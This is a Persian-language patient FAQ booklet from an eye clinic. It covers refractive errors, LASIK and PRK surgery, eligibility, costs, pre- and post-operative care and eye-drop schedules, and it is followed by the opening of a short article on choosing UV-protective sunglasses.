راهنمایی و پرسش و پاسخ درباره لیزیک

راهنمایی و پرسش و پاسخ درباره لیزیک

س : اختلال انکساری چشم چیست؟

ج: وضعیتی است که تصویر اشیاء دور ویا اشیاء نزدیک (در فاصله نزدیک مناسب کاری ) به صورت واضح روی شبکیه نمی افتد.

س : تفاوت نزدیک بینی و دور بینی در چیست؟

ج: در نزدیک بینی  فرد اشياء دور را خوب و واضح نمي بيند. ولی معمولاً مشکلی در دیدن اشیاء  نزدیک ندارد .در این افراد هر چه نزديك بيني شديد تر باشد دورترين فاصله اي كه شخص مي تواند دقيق ببيند كمتر است. ولی در افراد دوربین فرد نه اشیاءدور را خوب می بیند و نه اشیاء نزدیک را.

س: چرا افراد نزديك بين دور و افراد دوربین نه دور راخوب می بینند و نه نزدیک را ؟

ج:  در اشخاص نزدیک بین یا قدرت انكساري چشم بيشتر از افراد معمول است و يا اندازه ی كره ی چشم بزرگتر از افراد طبيعي است بنا براين تصاوير اشياء دور جلوتر از پرده ی حساس بينايي (شبكيه) مي افتد. چون هر چه اشیاء به چشم نزدیکتر می شود تصویر به عقب تر رانده می شود در نتیجه بر حسب نمره ی نزدیک بینی اشیاء از یک نقطه تا نزدیک چشم واضح دیده می شود ولی در افراد دوربین  اشیاء دور پشت چشم می افتد و هر چه اشیاء نزدیک تر می شود تصویر از چشم بیشتر فاصله می گیرد لذا در هیچ منطقه ای افراد دوربین واضح نمی بینند.

س : در افراد آستیگمات موضوع چگونه است؟

ج: در این افراد سطح قرنیه ویا عدسی کاملاً کروی و یک دست نیست لذا تصویر هر نقطه از یک شئی به صورت یک نقطه تشکیل نمی شود بنابراین فرد هیچ نقطه ای را واضح نمی بیند   .آستیگمات می تواند با نزدیک بینی یا دوربینی ویا ترکیبی از این دو همراه باشد.

س: چرا افراد دچار اختلال انکساری می شوند؟

ج:  مهمترين عامل اختلال در افراد، نژاد و ارث است. البته بعضي اعتقاد دارند كه كارهاي دقيق و ظريف در دراز مدت می تواند باعث بروز و پیشرفت نزدیک بینی شود . هرچند صدمات ضربه ای و برخی آسیب های التهابی قرنیه وجابجائی عدسی نیز در بروز اختلالات انکساری مخصوصاً آستیگمات بی تأثیر نیست.

س: چگونه از پيشرفت اختلالات انکساری (نزدیک بینی، دوربینی و یا آستیگمات )مي توان جلوگيري كرد؟ آيا استفاده مرتب از عينك و يا رعایت رژيم غذايي  خاص در بروز و یا پيشگيري از پیشرفت آن مؤثر است ؟

ج: خير، متأسفانه تاكنون هيچگونه اقدام  مؤثري جهت پيشگيري از پيشرفت این مشکلات بینائی تائيد نشده است. استفاده از عينك به صورت مرتب و همچنين رژيم غذايي نیز در اين رابطه بي تأثير بوده است.

س: نزديك بيني را برحسب نمره ی چشم چگونه تقسیم بندی می کنند؟

ج: نزدیک بینی را برحسب نمره چشم از خفیف تا بسیار بالا می توان تقسیم کرد که بر این مبنا نمره عینک کمتر از سه دیوپتر، خفیف ، بین سه تاشش دیوپتر، متوسط ، بین شش تا ده دیوپتر، بالا و بیش از ده دیوپتر بسیار بالا خوانده می شود .

س: به جز تاری دید آيا مشكل ديگري افراد نزديك بين را تهديد مي كند؟

ج: كساني كه دچار نزديك بيني ساده هستند ( معمولاً نمره عينك كمتر از 6 ديوپتر) تفاوت عمده اي با افراد معمولي ندارند ولي افرادي كه نزديك بيني مرضي (نوع پيشرونده) دارند، (معمولاً نمره عينك بيش از 6- ديوپتر) علت افزایش نمره عینک، بزرگ شدن تدریجی چشم است لذا با افزایش اندازه ی چشم شبکیه به مرور زمان نازک و کشیده شده این امر می تواند منجر به افزایش شانس جداشدگی شبکیه شود. ضمناً در اين افراد شانس بروز آب سياه ( گلوكوم) نيز بيش از افراد نرمال جامعه مي باشد.

س: چگونه مي شود نزديك بيني را اصلاح كرد؟

ج: اصلاح نزديك بيني به دو طريق صورت مي گيرد 1) استفاده از روشهاي غير جراحي مثل: عينك و لنز تماسي( سخت يا نرم)  2) استفاده از روشهاي جراحي که شامل: عمل جراحي با چاقوي الماس (اصطلاحاً PRK  نامیده می شود)، تعبیه لنز داخل چشمی ،کاشت حلقه داخل قرنیه و اگزیمر لیزر است .

س: آیا در مورد آستیگمات و دوربینی هم همین اقدامات را می شود انجام داد؟

ج: به جز کارگذاشتن حلقه داخل قرنیه و RK  سایر اقدامات ، البته با تفاوتهای جزئی، برای اصلاح این دو عارضه قابل استفاده است.

س: کدام عمل جراحی امروزه بیشتر استفاده می شود و چرا؟

ج: امروزه برای اصلاح اختلال انکساری از اگزایمرلیزر بیش از هر عمل دیگری استفاده می شود. علت آن سادگی، دقت و عوارض کم عمل است.

س: اگزایمر لیزر چیست؟

ج: اگزایمز لیزر یک کلمه انگلیسی است که مخفف   (Exited Dimer Eximer)   می باشد درترجمه ی فارسی می شود آن را معادل  مولکول دو اتمی تحریک شده دانست . اگزایمرلیزر انواع مختلفی دارد که بر مبنای اتم های تشکیل دهنده ی آن نامگذاری می شود. لیزری که در اصلاح اختلال انکساری به کار می رود از دو اتم آرگون و فلوئور تشکیل شده است. طول موج این نور لیزری 193 نانومتر است، از خصوصیات این لیزر، قدرت اثر زیاد در سطح کوچک و ضخامت بسیار کم است. به طوری که می تواند در سطحی به کوچکی فقط یک میکرون از قرنیه، اثر خود را بگذارد. این لیزر تاثیری بر بافتهای اطراف قرنیه و داخل چشم ندارد.

س: چگونه با ليزر عمل مي كنند؟

ج: روشهاي متعددي براي اصلاح اختلال انكساري با ليزر وجود دارد. ولی دو روش از سایر روشها مقبولیت بیشتری یافته است. یکی از این روشها که مخصوصاً درایران، رواج بیشتری دارد اصطلاحاً پی آر کیPRK نامیده می شود  كه در آن پس از برداشتن لايه پوششي قرنيه با تیغ یا الکل ، با ليزر سطحی از بافت قرنيه متناسب با نمره عينك برداشته مي شود. در روش ديگر با يك دستگاه مکانیکی یا یک دستگاه لیزر خاص (فمتوسکند) لايه اي از سطح قرنیه موقتاً برداشته شده زير آن ليزر مي شود و پس از انجام  ليزر، لايه ی برداشته شده به جاي اول باز می گردد. به اين روش ليزيك می گویند.

س: چه مدت است كه ليزر انجام مي شود؟

ج: اولين نمونه‏ هاي مشابه عمل ليزيك روي انسان در سال 1963 انجام شد. اين روش به تدريج پيشرفت و بهبود یافته  است. اگزايمر ليزر با شكل فعلي بيش از 25 سال است كه براي “PRK” مورد استفاده قرار مي گيرد.  ولي عمل ليزيك با شكل پيشرفته و امروزي از سال 1991 انجام مي شود.

س: كدام روش ليزر مناسب تر است؟

ج: روشها با توجه به هر فرد متفاوت است، يك فرد از PRK بهتر بهره مي برد و ديگري از Lasik . که اين بر اساس نمره عينك چشم و ضخامت قرنيه ی فرد تعیین می شود. در گذشته PRK به علت احتمال برگشت پذیری بيشتر و همچنین لكي كه گاهی روي قرنيه برجاي مي گذاشت در شماره هاي بالا توصيه نمي شد ولي امروزه با استفاده از داروهايي كه در حين عمل استفاده مي شود  اين عارضه  به حداقل رسيده در نتیجه تمایل بیشتري جهت انجام عمل به روش PRK وجود دارد.

س: اگر دستگاه اگزايمر ليزر، خود، عمل اصلاح نزديك بيني را انجام مي دهد، نقش جراح چشم چيست؟

ج: معاينه دقيق چشم به وسيله ی دستگاههاي مختلف، دادن اطلاعات دقيق از وضعيت چشم به سيستم رايانه اي دستگاه ليزر، انتخاب الگوی مناسب برداشت ، قبل از عمل، كنترل چشم حين و بعد از عمل و همچنين برداشتن لايه ی سطحي قرنيه با روش مکانیکال  به عهده ی جراح چشم است.

س: اگزایمر ليزر براي چه كساني مناسب تر است؟

ج: ليزر در طيف وسيعي از نزديک بيني و يا نزديك بيني همراه با آستيگماتيسم همچنين در دوربيني با شماره‏ هاي پايين ( معمولاً كمتر از 4 ديوپتر) به تنهایی و یا همراه باآستیگمات مناسب است.

س:  زمان عمل جراحي با ليزر چقدر است؟

ج: زمان کل عمل ليزر، برحسب روش کار  براي هر چشم معمولاًحدود  5-10دقيقه است.

س: آيا عمل جراحي ليزر درد ناک است؟

ج: با استفاده از قطره‏هاي بي‏حسي، عمل جراحي ليزر با حداقل درد انجام مي‏شود. هر چند پس از عمل ليزيك، احساس سوزش و جسم خارجي و اشك ريزش در چشم وجود دارد، اما معمولاً نيازي به داروي ضد درد نيست و اغلب روز بعد از عمل مي‏توان به كار روزانه بازگشت. ولي پس از عملPRK شدت و مدت درد بيشتر است، كه جهت کنترل آن از داروهاي ضد درد قويتر استفاده مي‏شود. مدت درد گاهی به بیش از سه روز نیز می رسد.

س: آيا مي توان دو چشم را با هم عمل كرد؟

ج: بله، مطالعات نشان داده است نتيجه ی عمل جراحي در صورتي كه دو چشم در يك جلسه يا مجزا عمل شوند تفاوت قابل توجهي ندارد. اغلب پزشكان و بيماران ترجيح مي دهند هر دو چشم در يك جلسه عمل شود.

س: چه کسانی می توانند لیزر کنند؟

ج:

1) تك چشمي نباشند .

2) سن بيشتر از 18 سال داشته باشند (بجز موارد خاص).

3) نمره عینک در طول يك سال بيش از نيم نمره افزايش نداشته باشد.

4) نمره عينك قابل اصلاح باشد.

5) فرد دچار تنبلی شدید چشم نباشد.

6) فرد مبتلا به قوز قرنيه ( كراتوكونوس) نباشد.

توضیح :موارد دیگری نیز توصیه شده است:

بيماريهاي عمومي مثل ديابت پيشرفته وجود نداشته باشد.
خشكي شديد چشم وجود نداشته باشد.
گلوكوم ( آب سياه) پيشرفته وجود نداشته باشد.
توقعات واقعي از قابليت و توانايي هاي عمل جراحي با ليزر وجود داشته باشد.
فرد در دوره حاملگی یا شیر دهی نباشد
برای بیماریهای بدخیم تحت درمان نباشد
س: تا چه سني مي شود عمل ليزر را انجام داد؟

ج: محدوديت سني براي اين اعمال وجود ندارد و فرد تا زمانی که مبتلا به بیماری مهم دیگری در چشم مانند: آب مرواريد ، آب سياه و نیز بيماريهاي ديگري كه مانع اين عمل باشند نشده، مي تواند كانديد عمل جراحي شود ، اما بايد دانست كه اگر اين اعمال بعد از سن 40 سالگي انجام شود، فرد براي مطالعه معمولاً نياز به عينك دارد.

س: آيا عمل PRK و ليزيك تنبلي چشم را درمان مي كند؟

ج: خير، عمل ليزر فقط در جهت اصلاح عیب انکساری انجام می شود و اگر چشمي به هر دليلي تنبل باشد، با ليزر اصلاح نمي گردد. به عبارت ديگر بايد دانست كه اعمال جراحي عيب انكساري، در اغلب موارد نمي‏توانند ديدي بهتر از عينك يا لنز به چشم بدهند.

س: آيا همه ی كساني كه منعي براي عمل ندارند به ليزر خوب جواب مي دهند ‌؟

ج: معمولاً بله، ولي افراد بايد انتظاري واقع‏گرايانه داشته باشند و بدانند كه جراحي هميشه نتيجه ی ايده‏آل را در پي نخواهد داشت. هر چند تراشيدن يك قطعه پلاستيك يا شيشه به منظور ساختن عينك يا كنتاكت لنز بسيار آسانتر و دقيقتر از شكل دادن يك بافت زنده مانند قرنيه است، ولي معمولاً بيش از 90%  افراد ديد طبيعي يا نزديك به طبيعي به دست  مي آورند. با این حال بايد دانست ديد 10/10 خصوصا در شماره‏هاي بسيار بالا را هيچ كس نمي تواند تضمين كند چه بسا ممكن است فرد براي رانندگي و يا كارهاي دقيق نزديك، نياز به عينك داشته باشد. لازم به ذکر است که حتي اگر   نمره ی چشم كاملاً اصلاح شود باز هم وقتي فرد به سن پير چشمي (حدود 40سال ) برسد نياز به عينك نزدیک بین دارد.

س: چرا بايد ليزر كرد؟

ج: تمايل به كاهش يا حذف وابستگي به عينك براي فعاليتهاي روزانه می تواند دليل مناسبي براي انجام عمل لیزر باشد. اگر شما تمايل داريد كه صبح از خواب بيدار شويد، بدون عينك عقربه ساعت را ببينيد، لباس بپوشيد، در خانه و محل كار، فعاليت كنيد و یا دوست داريد كه از ورزش به خصوص ورزشهاي آبي بدون استفاده از عينك و كنتاكت لنز لذت ببريد و یا مايل هستيد كه بتوانيد از خود و خانواده‏تان در موارد اضطراري و اورژانس بدون وابستگي به عينك يا كنتاكت لنز حفاظت كنيد اینها و بسیاری از موارد دیگر، اهداف منطقي و قابل دسترسي در اعمال جراحي انكساري هستند.

س: احتمال برگشت شماره چشم با ليزر چقدر است؟

ج: احتمال برگشت شماره ی چشم به قبل از عمل بسيار بعيد است. اگر افراد كانديد عمل، خوب انتخاب شوند و اتفاق غير منتظره اي پيش نيايد، معمولاً نتيجه ی عمل تا حدود 3 ماه مشخص شده و در عرض يك سال شماره ی چشم ثابت می شود البته معدودي از افراد نزديك بين هستند كه پيشرفت شماره ی چشم آنها هرگز متوقف نشده و سالانه 5/0 تا 1 شماره و بلكه بيشتر افزايش مي يابد. لازم است بدانيم كه ليزر قادر به جلوگیری از پيشرفت شماره چشم نیست و پس از عمل نيز ميزان نزديك بيني يا نمره عينك اين افراد هر چند سال تغيير خواهد كرد كه اين تغيير را نبايستي به حساب كاهش اثر ليزر و يا برگشت بيماري تلقي نمود. (معمولاً به اين بيماران انجام عمل لیزر توصیه نمي شود)

س: آيا امكان عمل مجدد براي افرادي كه قبلاً ليزر شده اند وجود دارد؟

ج: بله. چنانچه ضخامت قرنيه مناسب باشد مي توان بعد از عمل اول باقيمانده ی شماره چشم را با عمل بعدی اصلاح نمود. عوارض عمل دوم، مشابه عمل اول است و خطر بيشتري ندارد. البته در مواردي عليرغم باقيماندن شماره چشم، بيمار از ديد خود رضایت دارد و صرفاً به قصد صفر كردن شماره چشم تقاضاي عمل مجدد را مي كند، بديهي است در اينگونه موارد عمل مجدد علمي و منطقي نيست.

س: چگونه ممكن است نتيجه اعمال جراحي انكساري مناسب نباشد؟

ج: در صورتي كه شما انتظار نتيجه ی ايده‏آل داشته باشيد. در هيچ جراحي اطمينان صد در صد براي نتيجه ی ايده‏آل وجود ندارد و نمي‏توان حصول هدف نهايي شما را تضمين كرد.

س: آیا برای رسیدن به نتیجه ی مناسب ممکن است نیاز به بیش از یک بار عمل باشد؟

ج: البته ، هر فردی که عمل اصلاح انکساری را بپذیرد باید این را نیز قبول کند که برای رسیدن به نتیجه ی مناسب ممکن است دو یا چند بار تحت عمل قرار گیرد.

س: اگر نیاز به عمل مجدد باشدآیا  می بایست دوباره هزینه پرداخت ؟

ج: طبق ضوابط موجود پرداخت فقط در ارتباط با وسایل مصرفی است و بابت خود عمل هزینه ای پرداخت نمی شود.

س : چه زماني بعد از عمل ديد تقريباً كامل و ثابت مي شود؟

ج: در اغلب موارد پس از عمل،  بهبودي ديد، سريع است. اما ناگهاني نيست بخصوص در كساني كه بيش از 5 نمره ی نزديك بيني دارند، اين زمان ممكن است 3 ماه يا بيشتر طول بكشد لذا نباید انتظار ديد نهايي در هفته هاي اول بعد از عمل را داشت.

س : آيا كسي كه ليزر مي شود دید بهتری نسبت به استفاده از عینک دارد؟

ج: اگر نمره عينك يا لنز شما درست تجويز شده باشد، ديد پس از عمل معمولاً معادل ديد با عینک است.  چرا که عمل ليزر فقط شماره عينك شما را حذف مي كند. بنابر اين در اكثر موارد حدت بينايي تغييري نمي یابد و ديد در حد استفاده از يك عينك دقيق و مناسب بهبود می یابد ولي با توجه به افزايش ميدان بينايي كيفيت بينايي بهتر مي شود.

س: آيا عمل ليزر  سبب بيماري شب كوري يا كور رنگي مي شود؟

ج: معمولاً بيماري شب كوري (Night Blindness) و كور رنگي (Color Blindness) از بيماريهاي ارثي هستند و عمل ليزر باعث ايجاد اينگونه بيماريها نمي گردد. هر چند در هفته‏هاي اول  بعد از عمل جراحي ممکن است مشكلاتي در ديد شب به وجود آید، مانند پخش نور (Glare) يا ديدن هاله (Halo Vision) در اطراف اشيا نوراني و… البته در اعمال جراحي با دستگاههاي جديد اين مشكلات كمتر پيش مي آيد.

س: آيا مي توان بعد از عمل ليزر و ليزيك، از لنز تماسي رنگي و معمولي استفاده كرد؟

ج: بله، اما بهتر است كه استفاده از آن به سه ماه بعد از عمل موكول شود.

س: چرا در نزديك بيني خيلي  بالا، عمل ليزيك انجام نمي شود ؟

ج: براي اصلاح هر شماره از عينك بايد مقداری از ضخامت قرنيه تراشيده شود. و چون ضخامت قرنيه محدود است بنا براين ميزان شماره عينك قابل اصلاح نیز محدود است.

س: اگر با عمل ليزر از بافت قرنيه زياد برداشته شود چه اتفاقي مي افتد؟

ج: احتمال نازك شدن بيش از حد و بروز قوز قرنيه (كراتوكونوس) وجود دارد.

س: آيا عمل جراحي ليزر چشم را در مقابل ضربه آسيب پذير تر مي کند؟

ج: ثابت شده است كه استحكام قرنيه بعد از اعمال جراحي ليزري (Lasik, PRK) در مقايسه با استحكام قرنيه طبيعي، در برابر ضربه تفاوت زیادی نمي‏كند. اما بايد بدانيم كه چشم هاي نزديك‏ بين ذاتاً  به علت نازكي شبكيه، در مقابل ضربه نسبت به چشم هاي طبيعي آسيب‏پذيرتر هستند و اين به عمل ليزر ارتباطي ندارد. هر چند تا مدت زيادي بعد از اعمال جراحی لیزر امكان جابجايي فلپ قرنيه در ضربه ها امكان پذير است.

س: آیا روزه گرفتن و یا استفاده از رژیم غذایی خاص می تواند در نتیجه عمل موثر باشد؟

ج :خیر ، تا کنون اثر مثبت یا منفی هیچ نوع رژیم غذائی ثابت نشده است.

س: مراحل انجام لیزر در مرکز چشم پزشکی الزهراء(س) چگونه است؟

ج: مراحل انجام کار به شرح ذیل می باشد:

1)      معمولاً بیمار درخواست عمل را در ویزیت اولیه با دستیار چشم یا هر یک از چشم پزشکان ( در مطب) مطرح می کند.

2)      در صورت واجد شرایط بودن لازم است پزشک تصویر برداری با دستگاه Pentacam یا Orb-Scan را درخواست کند و نمره عینک جدید تعیین شود.

3)      ویزیت بعدی باید توسط چشم پزشکان فلوشیپ در سگمان قدامی مرکز چشم پزشکی انجام گیرد. در صورتیکه فرد متقاضی، واجد شرایط باشد به واحد اگزایمر لیزر ارجاع می شود.

4)      مسئول واحد اگزایمر لیزر مدارک و تصاویر مربوط به عمل را از فرد تحویل گرفته، پرونده ی عمل تشکیل می شود و اقدامات تکمیلی انجام می پذیرد

5)      پرونده تا قبل از عمل، بررسی شده نوع عمل و هزینه آن تعیین می گردد.

6)      پس از پرداخت هزینه ، در روزهای از پیش تعیین شده، عمل لیزر صورت می گیرد . و مراحل بعدی مطابق معمول کلینیک انجام می شود .

nbsp;

س: پزشک معالج چگونه تعیین می شود ؟

ج: هریک از افراد متقاضی  حتما قبل از عمل باید پزشک معالج خود را مشخص کند چرا که بعد از تشکیل پرونده تغییر پزشک معالج بسیار مشکل است ونیاز به موافقت پزشک معالج اولیه دارد.

س: لیزر سازگار شده (Customize) چیست؟

ج: در بعضی از افراد به علت نامنظم بودن سطح قرنیه و یا شرایط و مشکلاتی که پیش بینی می شود متعاقبً لیزر با مشخصات معمول ایجاد شود، ایجاب می کند. برای پیشگیری از بروز و یا درمان این مشکلات، که می تواند  در کیفیت بینایی و یا دید در شب تاثیر بگذارد ، تغییراتی در الگوی تابش اشعه لیزر توسط برخی نرم افزارها ایجاد می شود تا شانس بروز این عوارض ناخواسته به حداقل برسد. این کار را سازگار کردن لیزر یا Customizationمی گویند. البته از این ابزار، در هماهنگ کردن زاویه تابش لیزر با حرکات چرخشی چشم برای اصلاح آستیگمات نیز استفاده می شود.

س: آیا برای همه افراد می شود از این تکنیک بهره گرفت؟

ج: خیر ، از آنجائی که در این تکنیک معمولاً بافت بیشتری از قرنیه چشم برداشته می شود استفاده از آن در بعضی از افراد به خصوص کسانی که شماره عینک بالا و یا قرنیه ی نازک دارند عاقلانه نیست. لذا در این رابطه پزشک معالج بر مبنای نتایج حاصله از ارزیابی قبل از عمل ،روش انجام لیزر را انتخاب می کند.

س: در مرکز چشم پزشکی الزهراء(س) هزینه انجام لیزر دو چشم چقدر است؟

ج: هزینه های معاینات اولیه متقاضی حدود سیصد هزار  ریال است که می بایست نقداً پرداخت شود و تحت پوشش بیمه نمی باشد.

هزینه عمل لیزر به روش معمولی PKK مبلغ000/500/6 ریال و هزینه PRK با استفاده از تکنیک Customize مبلغ000/500/8 ریال       می باشد.
هزینه عمل لیزیک به میزان عمل PRK به انضمام قیمت وسایل مصرفی دستگاه برداشت لایه قرنیه می باشد.

توضیح:

س: آیا بیمه ها هزینه های اگزایمر لیزر را پرداخت می کنند؟

ج: از آنجائیکه  شرایط پوشش بیمه های مختلف متفاوت است ، هر یک از متقاضیان عمل لازم است  اطلاعات لازم را در مورد شرایط پرداخت    هزینه ها از بیمه ای که  تحت پوشش آن قرار دارند بگیرند. بدیهی است که مرکز تائیدیه های لازم را بر حسب  درخواست مراجع، صادر خواهد کرد.

س: فرد عمل شده چند بار و تا کی باید ویزیت شود وآیا هزینه ای هم برای ویزیت ها پرداخت می کند؟

ج: تعداد دفعات ویزیت ممکن است برای افرادمختلف برحسب نظر پزشک معالج  متفاوت باشد ولی معمولاً در چهار یا پنج روز اول، معاینات نزدیک به هم است ولی معاینات بعدی یک ماه ،سه ماه، شش ماه و یکسال بعد صورت می گیرد . در مورد پرداخت هزینه، در مرکز چشم پزشکی ویزیت به مدت یک هفته رایگان است و بعد از آن  طبق معمول تعرفه دریافت می شود.

توضیح: کسانی که می خواهند پیگیری های بعدی را در سیستم خصوصی انجام دهند لازم است قبلاً با پزشک معالج خویش هماهنگی نمایند. بدیهی است تعرفه ویزیت در مطب معمولاً طبق ضوابط جاری اخذ می شود.

س:  توصیه های قبل از عمل چیست؟

ج:

الف : از زمان معاینات تا انجام لیزر از لنز تماسی استفاده نشود.

ب: اگر بارداری محتمل است. عمل تاروشن شدن وضعیت آن به تعویق افتد.

ج: از بیست و چهار ساعت قبل از عمل از آرایش چشمها و صورت پرهیز شود.

د: حداقل شب و صبح قبل از عمل لبه ها و مژه ها ی چشم با شامپوی بچه با دقت شستشو داده شود.

ه: اگر فرد دچار بیماری تب دار و عفونی شد لازم است تا اطمینان از بهبود  بیماری عمل به تعویق افتد.

د: عمل ليزر در افرادي كه عفونت پلك يا اطراف چشم دارند ممنوع است.

و: روز عمل لازم است یک نفر از دوستان یا آشنایان فرد را همراهی کند.

ک: معمولاً یک ساعت قبل از عمل، یک عدد قرص آرام بخش توسط یکی از پرسنل لیزر به فرد داده می شود. برای پیشگیری از عوارض یا تداخل داروئی از مصرف داروی خود سرانه اجتناب شود.

توضیح: انجام عمل لیزر در زمان سیکل قاعدگی مشروط به رعایت مسائل بهداشتی لازم منعی ندارد

س:حين عمل لیزر به چه نکاتی باید توجه کرد

ج:

1)   توجه داشته باشيد كه اين اعمال دردناك نيستند و همكاري شما نقش بسيار مهمي در حصول نتيجه مناسب دارد. بنابر اين آرامش خود را حفظ نموده به دستورات پزشك حين جراحي توجه كنيد.

2)   در طول عمل به نور قرمز يا سبز رنگ چشمك‌زن نگاه كنيد و از حركت دادن چشم‌ها و سر خودداري نمایید.

3)   زمان  ليزر براساس اينكه از چه نوع ليزري استفاده شود، معمولاً كمتر از يك دقيقه است، بنابراين در طول مدتي كه صداي ليزر را مي‌شنويد چشم را حركت ندهيد.

4)   نگران پلك زدن خود به هنگام عمل نباشيد زيرا پلك‌هاي شما توسط وسيله‌اي از يكديگر باز نگهداشته مي‌شوند كه بهتر است براي پيشگيري از درد، موقع عمل از فشار دادن پلك‌ها و اخم كردن پرهيز كنيد.

5)   در حين عمل چند بار چشم شما با سرنگ حاوی سرم شستشو داده مي شود ، تزريقي در كار نيست نگران نشوید.

6)   دست‌ها را به محيط عمل نزديك نكنيد، زيرا باعث آلودگي و تأثير در نتيجه عمل مي‌شود.

س:  بعد از عمل  لیزر چه مواردی باید رعایت گردد ؟

الف : بلافاصله بعد از عمل داروهای تجویز شده تهیه گردد

ب: افراد عمل شده (مخصوصاً بعد از عمل PRK) به محل آرام وکم نور منتقل شوند.

توضیح :افرادی که لیزیک شده ا ند، توصیه می شود طي 24 ساعت اول بعد از عمل شيلد(محافظ) دائم روي چشم داشته باشند. و بعد از آن به مدت يك هفته شب ها موقع خواب از آن استفاده کنند.

ج: دستورات پزشک معالج برای مصرف دارو دقیقاً رعایت شود ودر صورتی که دستور خاصی داده نشده دستورات صفحه بعد این کتابچه لازم است انجام شود.

د: اگر لنز تماسی که در پایان عمل در چشم گذاشته شده از چشم خارج شد به هیچ وجه سعی به جاگذاری مجددآن نشود و بدون نگرانی به مرکزی که عمل انجام شده جهت خدمات لازم مراجعه شود.

ه: تا یک روز پس از برداشتن لنز تماسی از شستشوی صورت ودوش گرفتن اجتناب شود (مگر اینکه پزشک معالج دستور خاصی داده باشد).

و:چون اشعه ماوراء بنفش در پروسه ترمیم وشکل گیری مجدد قرنیه تاثیر دارد توصیه اکیدمی شود تا شش ماه از قرار گرفتن در معرض مستقیم نور خورشید پرهیز نموده و روزها از عینک مناسب آفتابی استفاده شود .

توضیح: استفاده از عینک آفتابی داخل خانه ضرورت ندارد.

ز: انجام دادن کارهای طولانی مدت ودقیق چشمی تا آرام شدن کامل چشمها توصیه نمی شود(حدود سه هفته).استفاده از کامپیوترهای با مانیتور LCD بعد از یک هفته منعی ندارد .

ک: حداقل تا دو هفته بعداز عمل از آرایش اطراف چشم اجتناب شود.

ل: تغییرات زیاد دید بعد از عملPRK  به علت سیرترمیم قرنیه  طبیعی است و برای دید نهایی تقریباً حدود سه ماه باید صبر کرد .

م: هرچه سن فرد و شماره اصلاح شده اولیه بیشتر باشد احتمال تار بینی دید نزدیک در ماههای اول بیشتر است. البته این مشکل به مرور زمان رفع می شود. هرچند لازم به توضیح است که در سن پیر چشمی (معمولاً بالای چهل سال ) بعد از عمل لیزر استفاده از عینک مطالعه اغلب ضرورت پیدا می کند.

ن : از هر زمان که فرد احساس راحتی کند می تواند در شرایط مناسب مطالعه کند.

 

س: دستورات دارويي بعد از عمل چیست:

ج:

1)   قطره ديكلوفناك ( ديكلوپتين يا بيوفناك)  هر 8 ساعت يك قطره به مدت 2 روز

2)   قطره كلرامفنيكل هر 4 ساعت يك قطره به مدت يك هفته

3)   قطره بتامتازون هر 6 ساعت يك قطره به مدت 2 هفته

4)   قطره فلوكورت (FML) از اول هفته سوم  به جاي قطره بتامتازون شروع شده و به صورت زير ادامه مي‌يابد:

هر 8 ساعت به مدت 4 هفته
هر 12 ساعت به مدت 4 هفته
روزي يكبار به مدت 8 هفته

5)   قطره اشك مصنوعي :

هر 4 تا 6 ساعت يك قطره به مدت 4 هفته
بر حسب نياز و سپس دستور پزشك

تذكر:

دستورات داروئي بر اساس نظر پزشك ممكن است تغییر كند.

با تشکر از توجهی که در مطالعه این کتابچه داشتید.

نحوه صحيح استفاده از قطره‌هاي چشمي.

سر خود را كمي به عقب خم كنيد.
پلك تحتاني را به سمت پايين بكشيد.
قطره را در اين قسمت بچكانيد (بدون تماس نوك قطره‌چكان با چشم يا پلك)
چشم خود را به مدت 3 دقيقه ببنديد، سپس پلك بزنيد.
بعد از باز كردن چشم‌ها، اشك و يا قطره جذب نشده را با دستمال تميز از اطراف چشم خشك كنيد.
در صورتي كه پزشك بيش از يك نوع قطره را همزمان تجويز كند، استفاده از آنها بايد با فاصله زماني 10 – 5 دقيقه انجام شود

تقريبا هركسي كه تحت عمل جراحي قرار مي گيرد مي خواهد بداند كه شانس بدست آوردن نتيجه رضايت بخش چقدر است. براي نزديك‏بيني كم و متوسط (تا 7- ديوپتر) در حدود 95% بيماران ديد بدون عينك 10/5 تا 10/6 يا بيشتر را به دست مي‏آورند و 85% شانس ديد بدون عينك 10/8 تا 10/9 يا بهتر را دارند. اين بدان معناست كه وابستگي افراد به ميزان بسيار زيادي به عينك كم شده است اما احتمال دارد براي انجام كارهاي دقيق‏تر چشمي مانند رانندگي، علي‏الخصوص در شب به يك عينك با شماره كم نياز داشته باشند. براي ميوپي بالا (بالاي 7- ديوپتر) در حدود 85% بيماران ديد بدون عينك10/5 تا 10/6 يا بهتر و 70% ديد بدون عينك 10/8 تا 10/9 يا بهتر را بدست مي‏آورند.

نوسنده : دکتر محمد رضا روحانی (فلوشیپ سگمان قدامی)

توجه : تمامی حقوق این مطلب برای نویسنده محفوظ است.

ویژگی های عینک آفتابی استاندارد+روش شناخت

strongویژگی های عینک آفتابی استاندارد+روش شناخت/strong

عینک‌ها باید حداقل ۹۸ درصد از UVA و UVB را جذب کنند چون عینکی که استاندارد نیست، بسیار مضرتر از نزدنش است، چراکه عینک آفتابی باعث می‌شود مردمک چشم باز شود و حال اگر UV را جذب نکند، تمام اشعه‌های مضر به داخل چشم نفوذ می‌کنند.!–more–

اشعه ماوراء بنفش یا همان (UV) دارای سه نوع طول موج UVA ،UVB و UVC است که اشعه «UVC» در لایه ازن جذب شده و به زمین نمی‌رسد و آن قسمتی که برای چشم مضر است UVB است که موجب سوختگی پوست و اثرات مضر روی چشم است. تماس زیاد با اشعه UVB می‌تواند در مدت زیاد بیماری‌های برگشت‌ناپذیر، مانند: آب مروارید، تغییر در مرکز دید و ناخنک چشم را فراهم آورد. اشعه «UVA» بیشتر توسط عدسی چشم جذب می‌شود و مدرکی برای ضرر چشم وجود ندارد.

استفاده از عینک‌های آفتابی  به عنوان یک ضرورت و حفظ سلامت چشم‌ها مطرح شده است . محافظت چشم در مقابل نور شدید آفتاب و اشعه فرابنفش موجود در آن بسیار مهم است. استفاده از عینک آفتابی مناسب در شرایطی که نور آفتاب شدید است، باعث بهتر شدن دید و پیشگیری از صدمه به عدسی و شبکیه چشم می‌شود. استفاده از عینکهای تقلبی نه تنها این خاصیت را ندارند بلکه سبب بسیاری از عوارض چشمی‌می‌شوند که از آن جمله می‌توان، کاهش بینایی، آب مروارید و بیماری شبکیه را نام برد.

nbsp;

strongتوصیه های لازم در مورد انتخاب عینک آفتابی/strong

nbsp;

۱- افرادی که در حال اسکی کردن، حمام آفتاب گرفتن و کوهنوردی در ارتفاعات هستند باید حتماً از عینک آفتابی استفاده کنند. برای اینگونه محیط‌ها عینک‌هایی لازمند که فقط ۱۲ ـ ۸ درصد نور را از خود عبور دهند.

nbsp;

